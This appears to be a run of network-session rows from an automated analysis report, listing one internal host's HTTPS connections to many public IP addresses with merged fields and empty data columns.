                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14243192.168.2.1450898147.134.66.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14244192.168.2.144539850.145.152.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14245192.168.2.144587012.222.48.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14246192.168.2.1448608163.33.68.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14247192.168.2.1457984103.203.120.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14248192.168.2.143720886.139.54.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14249192.168.2.144612038.61.179.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14250192.168.2.1451676106.0.151.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14251192.168.2.144853482.253.217.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14252192.168.2.144786449.151.62.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14253192.168.2.1453200115.201.145.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14254192.168.2.145883049.150.249.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14255192.168.2.1433110161.43.202.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14256192.168.2.144934484.136.228.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14257192.168.2.1449648101.20.22.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14258192.168.2.144203895.255.255.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14259192.168.2.145832243.28.246.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14260192.168.2.144849463.40.229.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14261192.168.2.1441810106.240.174.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14262192.168.2.1438644117.110.244.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14263192.168.2.1439380152.251.95.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14264192.168.2.1450620168.114.61.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14265192.168.2.145440064.178.147.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14266192.168.2.144403288.20.97.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14267192.168.2.1449344138.22.142.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14268192.168.2.145327857.216.196.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14269192.168.2.144048272.216.132.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14270192.168.2.145062054.235.108.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14271192.168.2.1458620180.142.52.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14272192.168.2.145278847.217.134.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14273192.168.2.1432816201.124.18.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14274192.168.2.145923841.111.159.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14275192.168.2.145217060.196.94.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14276192.168.2.145640099.13.165.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14277192.168.2.1459108171.24.228.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14278192.168.2.1446012195.159.142.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14279192.168.2.1453582140.135.222.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14280192.168.2.1441190184.8.154.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14281192.168.2.1449734100.22.202.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14282192.168.2.1458660216.61.0.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14283192.168.2.1439328158.23.173.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14284192.168.2.146048241.99.8.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14285192.168.2.1438904162.132.150.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14286192.168.2.144961499.239.156.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14287192.168.2.1435946188.3.229.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14288192.168.2.1440176138.159.13.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14289192.168.2.144597872.69.209.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14290192.168.2.1449776216.27.152.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14291192.168.2.1437574154.98.220.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14292192.168.2.144257671.158.255.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14293192.168.2.1454360113.100.212.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14294192.168.2.1446874126.106.68.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14295192.168.2.1457208164.115.212.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14296192.168.2.1451866192.58.81.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14297192.168.2.143751262.236.125.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14298192.168.2.146031280.13.246.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14299192.168.2.1445054168.127.125.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14300192.168.2.1440682162.89.202.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14301192.168.2.1435348166.126.116.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14302192.168.2.1436550112.19.22.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14303192.168.2.143651440.198.35.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14304192.168.2.1434222153.128.125.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14305192.168.2.144010063.229.63.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14306192.168.2.143332417.137.133.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14307192.168.2.143504267.9.63.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14308192.168.2.1457766199.28.147.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14309192.168.2.1444896163.73.174.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14310192.168.2.143449296.144.160.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14311192.168.2.145320662.9.252.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14312192.168.2.1445426150.100.95.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14313192.168.2.145932291.30.125.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14314192.168.2.143494859.167.20.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14315192.168.2.144468235.209.38.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14316192.168.2.1452184222.218.102.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14317192.168.2.144219844.6.67.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14318192.168.2.1437616161.51.173.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14319192.168.2.143288269.84.82.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14320192.168.2.1457064223.50.73.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14321192.168.2.145354676.239.217.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14322192.168.2.144621832.29.44.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14323192.168.2.1449210153.172.7.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14324192.168.2.1442636207.153.213.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14325192.168.2.1433370144.148.154.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14326192.168.2.1434926151.196.34.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14327192.168.2.1448816192.100.125.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14328192.168.2.145157292.14.67.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14329192.168.2.1447708194.75.111.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14330192.168.2.145518431.215.169.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14331192.168.2.145041695.102.219.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14332192.168.2.143601670.132.89.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14333192.168.2.1436676216.122.33.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14334192.168.2.1459008170.7.6.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14335192.168.2.1436692159.159.41.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14336192.168.2.1439494220.243.14.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14337192.168.2.1440200136.220.29.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14338192.168.2.143726612.210.207.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14339192.168.2.1443508115.151.173.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14340192.168.2.145238841.145.180.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14341192.168.2.143337896.178.93.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14342192.168.2.144724268.247.97.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14343192.168.2.1444208112.125.1.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14344192.168.2.144577263.54.199.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14345192.168.2.1439352123.220.45.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14346192.168.2.144092064.185.194.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14347192.168.2.1447926188.18.203.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14348192.168.2.14445542.207.182.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14349192.168.2.1455038131.228.106.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14350192.168.2.146010694.0.120.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14351192.168.2.144555673.67.169.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14352192.168.2.1459562196.236.228.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14353192.168.2.145386424.195.237.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14354192.168.2.143963043.29.64.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14355192.168.2.1443802131.52.25.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14356192.168.2.145025658.137.90.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14357192.168.2.143893812.146.114.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14358192.168.2.1453390210.6.59.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14359192.168.2.1439862155.48.83.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14360192.168.2.1452584137.101.254.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14361192.168.2.1457190193.77.170.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14362192.168.2.145367272.220.234.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14363192.168.2.143949273.38.16.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14364192.168.2.1440292171.156.88.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14365192.168.2.1432870115.243.134.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14366192.168.2.1437926188.35.65.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14367192.168.2.1445432157.65.23.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14368192.168.2.1433760171.127.152.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14369192.168.2.1444684124.141.154.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14370192.168.2.1434650162.168.136.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14371192.168.2.1438338155.161.23.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14372192.168.2.1441726157.48.29.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14373192.168.2.1450776114.98.185.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14374192.168.2.1445802123.112.196.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14375192.168.2.145277078.47.212.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14376192.168.2.145450060.25.97.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14377192.168.2.1438810196.189.212.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14378192.168.2.1449000155.0.74.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14379192.168.2.1434328112.61.0.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14380192.168.2.1460812212.81.215.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14381192.168.2.1452330172.64.51.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14382192.168.2.1457022209.243.24.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14383192.168.2.144485013.195.233.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14384192.168.2.145242091.105.53.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14385192.168.2.1448332158.161.5.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14386192.168.2.1445242222.64.10.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14387192.168.2.1435842184.194.203.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14388192.168.2.1434216182.31.78.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14389192.168.2.1449530210.170.118.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14390192.168.2.1449404218.5.15.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14391192.168.2.1450950111.116.153.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14392192.168.2.1454638181.239.90.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14393192.168.2.144681063.23.84.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14394192.168.2.1446664108.89.79.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14395192.168.2.143453665.84.239.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14396192.168.2.1435998169.15.81.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14397192.168.2.1436634138.163.120.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14398192.168.2.144521853.65.246.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14399192.168.2.145710693.60.33.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14400192.168.2.1439832140.223.22.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14401192.168.2.145858443.66.153.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14402192.168.2.1444064145.37.74.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14403192.168.2.144616631.30.238.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14404192.168.2.143911867.88.96.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14405192.168.2.1439698195.93.101.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14406192.168.2.1445672126.40.70.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14407192.168.2.144267870.118.17.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14408192.168.2.144739475.150.137.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14409192.168.2.1452746157.57.136.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14410192.168.2.144451260.165.57.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14411192.168.2.145883039.209.162.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14412192.168.2.144017871.203.27.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14413192.168.2.1448066131.10.1.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14414192.168.2.145639652.5.38.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14415192.168.2.1445896125.173.154.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14416192.168.2.1444236197.17.109.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14417192.168.2.1445472195.145.15.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14418192.168.2.1456810136.16.30.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14419192.168.2.143765613.18.226.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14420192.168.2.1433490110.132.212.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14421192.168.2.145594652.23.54.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14422192.168.2.1460070106.188.240.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14423192.168.2.1460766155.76.76.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14424192.168.2.145745650.16.149.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14425192.168.2.1435922164.29.89.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14426192.168.2.145049077.113.105.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14427192.168.2.144270019.111.172.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14428192.168.2.1450196195.152.85.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14429192.168.2.145283689.0.17.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14430192.168.2.1441484173.46.118.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14431192.168.2.144964468.59.248.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14432192.168.2.145707465.98.250.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14433192.168.2.144337248.26.241.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14434192.168.2.146002671.151.157.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14435192.168.2.144040495.152.34.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14436192.168.2.145606035.139.33.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14437192.168.2.144770896.102.38.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14438192.168.2.1437568166.142.45.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14439192.168.2.145074279.222.60.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14440192.168.2.1439158173.160.211.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14441192.168.2.1458866175.0.85.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14442192.168.2.1434180187.238.28.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14443192.168.2.145217667.127.221.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14444192.168.2.145691869.191.197.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14445192.168.2.1458876106.36.136.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14446192.168.2.1460224196.246.87.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14447192.168.2.145705265.164.169.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14448192.168.2.143814460.169.33.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14449192.168.2.1454774218.82.226.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14450192.168.2.1451854153.218.85.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14451192.168.2.1435662105.11.121.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14452192.168.2.1441830210.235.176.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14453192.168.2.1458848185.221.30.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14454192.168.2.143915286.183.186.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
